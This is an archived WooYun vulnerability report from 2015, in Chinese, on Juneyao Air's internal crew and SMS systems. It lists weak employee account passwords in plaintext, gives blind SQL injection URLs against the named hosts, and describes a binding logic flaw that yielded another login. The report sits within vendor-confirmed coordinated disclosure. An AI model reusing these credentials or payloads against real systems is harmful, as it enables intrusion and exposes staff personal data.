当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147730

漏洞标题:航空安全之吉祥航空弱口令\SQL注入\奇葩逻辑等漏洞打包提交(泄漏员工通讯录\进入多个系统\大量敏感信息)

相关厂商:juneyaoair.com

漏洞作者: harbour_bin

提交时间:2015-10-19 11:54

修复时间:2015-12-07 09:22

公开时间:2015-12-07 09:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

RT
PS:危害很大, 厂商注意了, 不想分开提交了, 求20rank

详细说明:

1、弱口令问题

http://crewinternal.juneyaoair.com:65/


存在验证码, 识别OCR进行测试, 得到以下帐号

wangyu 888888
wangyusen a1234567
youxiaozhi a1234567


危害证明,仅截部分证明, 危害你们知道的

crew1.jpg


内部通讯录

crew2.jpg


航班信息

crew3.jpg


身份证、护照等信息

crew4.jpg


2、未授权访问+SQL注入

http://sms.juneyaoair.com:9080/SMSNEW/oa!aircrewLogin?username=BaiNingKai&airuser.aircrewName=BaiNingKai&airuser.aircrewDepartment.aircrewDeptCode=FL17

此处未授权访问
airuser.aircrewDepartment.aircrewDeptCode处存在SQL注入
手动注入:

http://sms.juneyaoair.com:9080/SMSNEW/oa!aircrewLogin?username=BaiNingKai&airuser.aircrewName=BaiNingKai&airuser.aircrewDepartment.aircrewDeptCode=FL17' and substring(database(),1,6)=char(115,109,115,110,101,119) and '1'='1


数据库名:smsnem

http://sms.juneyaoair.com:9080/SMSNEW/oa!aircrewLogin?username=BaiNingKai&airuser.aircrewName=BaiNingKai&airuser.aircrewDepartment.aircrewDeptCode=FL17' and length(user())=18 and '1'='1


证明一下:

SQL注入.jpg


3、业务逻辑漏洞
此处还存在一次很奇葩的逻辑问题, 接下来我们利用这个登录sms系统, let's go!
进行绑定, 绑定成功后会显示出错(其实已经成功绑定), 再次绑定后显示为用户名已经存在, 测试发现成功

sms1.jpg


第二次

sms2.jpg


成功登录

http://sms.juneyaoair.com:9080/SMSNEW/


用户名BaiNingKai 密码bnk123


sms3.jpg


里面存在大量敏感信息, 证明一下

sms4.jpg


sms5.jpg


4、危害扩大
该处的逻辑漏洞结合第一处的通讯录, 可重置所有用户的密码; 同时, 可结合通讯录重新进行爆破, 危害不言而喻!

漏洞证明:

另外一个帐号, 昨晚测试的

QQ截图20151018220742.jpg


PS:危害不够可补充, 谢谢

修复方案:

你们更专业!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-23 09:21

厂商回复:

漏洞确认

最新状态:

暂无